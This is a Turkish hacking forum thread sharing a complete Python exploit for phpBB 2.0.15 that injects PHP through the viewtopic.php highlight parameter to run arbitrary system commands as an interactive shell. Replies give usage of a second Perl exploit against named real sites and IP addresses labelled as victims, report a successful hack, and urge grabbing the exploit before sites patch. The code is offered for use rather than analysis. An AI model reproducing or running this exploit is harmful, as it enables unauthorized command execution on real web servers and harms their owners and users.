Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Bilişim Güvenliği 
Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit
-
bununla phpBB 2.0.15 versionlu forumlarda PHP kodu çalıştırabilirsiniz
#!/usr/bin/pyth0n
print "\nphpBB 2.0.15 arbitrary command execution eXploit"
print " 2005 by rattle@awarenetwork.org"
print " well, just because there is none."
import sys
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus
INITTAG = '<g0>'
ENDTAG = '</g0>'
def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))
_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"
def usage():
print """Usage: %s <forum> <topic>
forum - fully qualified url to the forum
example: http://www.host.com/phpBB/
topic - ID of an existing topic. Well you
will have to check yourself.
"""[:-1] % sys.argv[0]; sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) < 3 or not sys.argv[2].isdigit():
usage()
else:
print
url = sys.argv[1]
if url.count("://") == 0:
url = "http://" + url
url = list(urlparse(url))
host = url[1]
if not host: usage()
if not url[0]: url[0] = 'http'
if not url[2]: url[2] = '/'
url[3] = url[4] = url[5] = ''
url = urlunparse(url)
if url[-1] != '/': url += '/'
topic = quote_plus((sys.argv[2]))
while 1:
try:
cmd = raw_input("[%s]$ " % host).strip()
if cmd[-1]==';': cmd=cmd[:-1]
if (cmd == "exit"): break
else: cmd = makecmd(cmd)
out = _ex % (url,topic,cmd)
try: ret = urlopen(Request(out)).read()
except KeyboardInterrupt: continue
except: pass
else:
ret = ret.split(INITTAG,1)
if len(ret)>1: ret = ret[1].split(ENDTAG,1)
if len(ret)>1:
ret = ret[0].strip();
if ret: print ret
continue;
print "EXPLOIT FAILED"
except:
continue -
interpreter'a dikkat sistemde pyth0n olması lazım. çaliştırabilmek için.
-
hımms
-
bu php php nuke bunların patchlerini indirin içinde yazıyor nerde ne eksik olduğu
-
S.a
Exploit Calısıyor.Herhangi bir hata ile karsılamasmadım
örn kullanım:"perl phpbbSecureD.pl 66.118.142.80 /httpdocs/ 80" sekinde calıstırabilirsinz
Kurban Site Ipsi: 66.118.142.80
PhpBB nin bulundugu dizin: /httpdocs/
Saldırılacak Port: 80 -
ben perl/bin dizinine exploiti "phpbbSecureD.pl" şeklinde kaydetim perli açıp alttaki kod satırını yazdım ama kabul etmedi. Site örnektir..
perl phpbbSecureD.pl www.akvadi.com /akvadi/ 80
Semicolon seems to be missing hatası veriyor neyi yanlış yapıyorum?
-
Domain Adresini degil Sitenin Ip Adresini yazman gerekiyor
///////////////////
C:\Perl\bin>perl phpbbSecureD.pl 82.222.180.50 /akvadi/ 80
+-----------------------------------------------------------
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------
[+] Connecting OK
[+] Sending exploit FAILED
/////////////////// -
Yine olmadı. Bende eprlin eski versiyonu fln mı var. txt şeklinde oluyor .pl uzantısıyla kaydetsende. Runlamıyor.. Seer hocam PM ye bakar mısın..
-
DİKKAT:Az ewwel yazmıs oldugum cevapta yanlıslık var
80 yerine 20 veya 8 Gelicek!!!!!!
5-6Dk önceki hacked.cok güzel bi sekilde calısıyor
-
Evet açık çok baba geçmeden millet uyanmadan indirin işte.
-
bi b.k anlamadm walla.....
pro nerde neyi nerde ve nasıl kullanacağız? sanki bunları sadece bilenler kendi aralarında paylaşıyorlarmı ...yanii..ne bilim hocam öğretmenlik yapacak birileri.....
eğitim şart dimi ama
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla